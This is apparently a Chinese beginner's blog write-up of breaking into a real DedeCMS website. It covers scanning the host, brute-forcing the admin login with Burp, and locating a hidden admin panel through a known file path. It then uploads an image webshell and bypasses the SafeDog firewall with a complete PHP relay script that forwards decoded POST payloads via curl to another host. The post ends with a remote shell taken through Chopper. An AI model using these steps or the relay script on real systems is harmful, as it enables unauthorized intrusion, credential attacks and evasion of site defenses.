一、信息收集
首先對網站的信息進行判斷,可以很明顯的判斷出來是dedecms(織夢)
鑒於織夢的漏洞比較多,我們先對網站的信息進行一下收集,再進行下一步的操作。在這里我們可以判斷網站使用了安全狗的防護。
我們再去站長平台來對網站進行一次檢測,我們可以看到網站的IP地址,並且判斷出來是個本地的服務器。
再回到網站,我們隨便點開一篇文章,看到頁腳作者信息,不出所料admin,此時,心里面應該有數了,后台管理員賬戶就是admin,就差找到后台地址了,hiahia~
有了這些還覺得太少,於時丟進nmap對主機一頓掃,看到了開放的這幾個端口:
23/tcp open telnet
80/tcp open http
1935/tcp open rtmp
3389/tcp open ms-wbt-server
看到3389長嘆一口氣,應該可以確定是win的服務器了。使用遠程桌面連接了一下IP試試,沒得跑。
二、利用過程
方案一:有了IP地址和3389的信息,我們可以用hydra來對3389進行一下爆破,可以用網頁下面的信息,和域名的注冊信息,在這里看到還有幾個子站,應該是委托搭建的。
方案二:織夢cms通用后台都是/dede,但是顯然這個管理員已經更改了后台地址,但是絲毫不慌,我們只需要稍微的變動一下,就會有辦法,只要思想不滑坡,辦法總比困難多。我們把地址改為:http://xxxx.com/include/dialog/select_media.php?f=form1.murl即可看到以下畫面:
或者使用掃描軟件對網站進行一波掃描,也是同樣可以的。
進入到后台地址之后,發現后台連個驗證碼都沒有,鑒於前面已經知道了網站管理員的賬號,於時我們就請出大寶劍burp,一陣梭哈之后,就get到了后台管理員的密碼,對於字典的生成,可以去找個字典平台,把收集到的網站信息田間去,自動生成字典,我這邊使用的是常用100密碼,鑒於管理員的安全意識較差,我就直接進♂來了。
后台有圖片上傳接口,上傳圖片馬不會攔截,因為有安全狗,所以需要繞過一下,因為某些原因,后面的過程就簡單概括以下,通過本地搭建web服務,把eval數據進行base64加密,創建一個跳板,跳過小狗。
創建shell.php
<?php
$target="<a rel="external nofollow" href="192.168.1.3/install/shell.php";>";
$poststr='';
$i=0;
foreach($_POST as $k=>$v)
{
if(strstr($v, "base64_decode"))
{
$v=str_replace("base64_decode(","",$v);
$v=str_replace("))",")",$v);
}
else
{
if($k==="z0")
$v=base64_decode($v);
}
$pp=$k."=".urlencode($v);
//echo($pp);
if($i!=0)
{
$poststr=$poststr."&".$pp;
}
else
{
$poststr=$pp;
}
$i=$i+1;
}
$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING'];
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>
之后菜刀直連getshell,一頓梭哈之后,上傳補天。
剛入門安全,文章技術性不是很高,歡迎各位大佬前來吐槽,大家一起交♂流學習!